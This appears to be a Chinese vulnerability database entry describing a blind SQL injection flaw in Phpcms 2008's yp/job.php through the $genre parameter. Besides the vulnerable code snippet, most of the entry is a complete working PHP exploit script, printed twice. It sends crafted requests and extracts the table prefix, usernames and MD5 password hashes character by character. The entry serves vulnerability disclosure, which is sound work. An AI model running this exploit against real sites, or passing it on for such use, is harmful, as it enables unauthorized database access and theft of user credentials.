Phpcms 2008 yp/job.php脚本SQL盲注漏洞

基本字段

漏洞编号：: SSV-19753

披露/发现时间：: 未知

提交时间：: 2010-06-09

漏洞等级：

漏洞类别：: SQL 注入

影响组件：: phpcms
(2008)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0.6KB

Phpcms网站管理系统是国内主流CMS系统之一

Phpcms所使用的yp/job.php脚本的urldecode函数没有正确地过滤用户所提交的$genre参数便在SQL查询中使用，远程攻击者可以通过提交恶意请求执行SQL注入攻击。以下是有漏洞的PHP代码段：

switch($action)
{
case 'list':
$catid = intval($catid);
$head['keywords'] .= '职位列表';
$head['title'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$head['description'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$templateid = 'job_list';
if($inputtime)
$time = time() - 3600*$inputtime*24;
else $time = 0;
if($time &lt; 0 )$time = 0;
$where = &quot;j.updatetime &gt;= '{$time}' &quot;;
$genre = urldecode($genre);
if($station)$where .= &quot;AND j.station = '{$station}' &quot;;
if($genre)$where .= &quot;AND c.genre = '{$genre}' &quot;;
if(!trim($where))$where = '1';
break;

Phpcms 2008 厂商补丁：

phpcms

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.phpcms.cn/

共 4 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 2.5KB

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
&lt;?
ini_set(&quot;max_execution_time&quot;,0);
error_reporting(7);
if ($argc != 4)
usage ();
$hostname = $argv [1];
$path = $argv [2];
$userid = $argv [3];
$prefix=&quot;phpcms_&quot;;
//$key = &quot;abcdefghijklmnopqrstuvwxyz0123456789&quot;;
$pos = 1;
$chr = 0;
function usage ()
{
global $argv;
echo
&quot;\n[+] PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit&quot;.
&quot;\n[+] Author: My5t3ry&quot;.
&quot;\n[+] Site : http://hi.baidu.com/netstart&quot;.
&quot;\n[+] Usage : php &quot;.$argv[0].&quot; &quot;.
&quot;\n[+] Ex. : php &quot;.$argv[0].&quot; localhost /yp 1&quot;.
&quot;\n\n&quot;;
exit ();
}
function request ($hostname, $path, $query)
{
$fp = fsockopen ($hostname, 80);
$request = &quot;GET {$path}/job.php?action=list&amp;inputtime=0&amp;station=4&amp;genre={$query} HTTP/1.1\r\n&quot;.
&quot;Host: {$hostname}\r\n&quot;.
&quot;Connection: Close\r\n\r\n&quot;;
fputs ($fp, $request);
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

<? ini_set("max_execution_time",0); error_reporting(7); if ($argc != 4) usage (); $hostname = $argv [1]; $path = $argv [2]; $userid = $argv [3]; $prefix="phpcms_"; //$key = "abcdefghijklmnopqrstuvwxyz0123456789"; $pos = 1; $chr = 0; function usage () { global $argv; echo "\n[+] PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit". "\n[+] Author: My5t3ry". "\n[+] Site : http://hi.baidu.com/netstart". "\n[+] Usage : php ".$argv[0]." ". "\n[+] Ex. : php ".$argv[0]." localhost /yp 1". "\n\n"; exit (); } function request ($hostname, $path, $query) { $fp = fsockopen ($hostname, 80); $request = "GET {$path}/job.php?action=list&inputtime=0&station=4&genre={$query} HTTP/1.1\r\n". "Host: {$hostname}\r\n". "Connection: Close\r\n\r\n"; fputs ($fp, $request); while (!feof ($fp)) $reply .= fgets ($fp, 1024); fclose ($fp); return $reply; } function exploit ($hostname, $path, $uid, $fld, $chr, $pos) { global $prefix; $chr = ord ($chr); $query = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM ".$prefix."member WHERE userid = '{$uid}'),{$pos},1))={$chr} OR '1' = '2"; $query = str_replace (" ", "%20", $query); $query = str_replace ("'", "%2527", $query); $outcode = request ($hostname, $path, $query); preg_match ("/(.+)< \/span>/", $outcode, $x); if (strlen (trim ($x [1])) == 0) return false; else return true; } $query = "x%2527"; $outcode = request ($hostname, $path, $query); preg_match('/FROM `(.+)yp_job/ie',$outcode,$match); $prefix=$match[1]; //function lengthcolumns () //{ echo "\n--------------------------------------------------------------------------------\n"; echo " PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit\n"; echo " By My5t3ry (http://hi.baidu.com/netstart)\n"; echo "\n--------------------------------------------------------------------------------\n"; echo "[~]trying to get pre...\n"; if ($match[1]) { echo '[+]Good Job!Wo Got The pre -> '.$match[1]."\n"; } else { die(" Exploit failed..."); } echo "[~]trying to get username length...\n"; $exit=0; $length=0; $i=0; while ($exit==0) { $query = "x' OR length((select username from ".$prefix."member Where userid='{$userid}'))=".$i." OR '1'='2"; $query = str_replace (" ", "%20", $query); $query = str_replace ("'", "%2527", $query); $outcode = request ($hostname, $path, $query); $i++; preg_match ("/(.+)< \/span>/", $outcode, $x); //echo $outcode; if ($i>20) {die(" Exploit failed...");} if (strlen (trim ($x [1])) != 0) { $exit=1; }else{ $exit=0; } } $length=$i-1; echo "[+]length -> ".$length; // return $length; //} echo "\n[~]Trying to Crack..."; echo "\n[+]username -> "; while ($pos < = $length) { $key = "abcdefghijklmnopqrstuvwxyz0123456789"; if (exploit ($hostname, $path, $userid, "username", $key [$chr], $pos)) { echo $key [$chr]; $chr = -1; $pos++; } $chr++; } $pos = 9; echo "\n[+]password(md5) -> "; while ($pos < = 24) { $key = "abcdef0123456789"; if (exploit ($hostname, $path, $userid, "password", $key [$chr], $pos)) { echo $key [$chr]; $chr = -1; $pos++; } $chr++; } echo "\n[+]Done!"; echo "\n\n--------------------------------------------------------------------------------"; ?>

等 14 兑换

参考链接

http://hi.baidu.com/netstart/blog/item/f891b1514a259112367abeb5.html

解决方案

临时解决方案

无

官方解决方案

升级到最新无漏洞版本

防护方案

无

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

基本字段

来源

漏洞详情

phpcms

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

Phpcms 2008 yp/job.php脚本SQL盲注漏洞

基本字段

来源

漏洞详情

phpcms

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定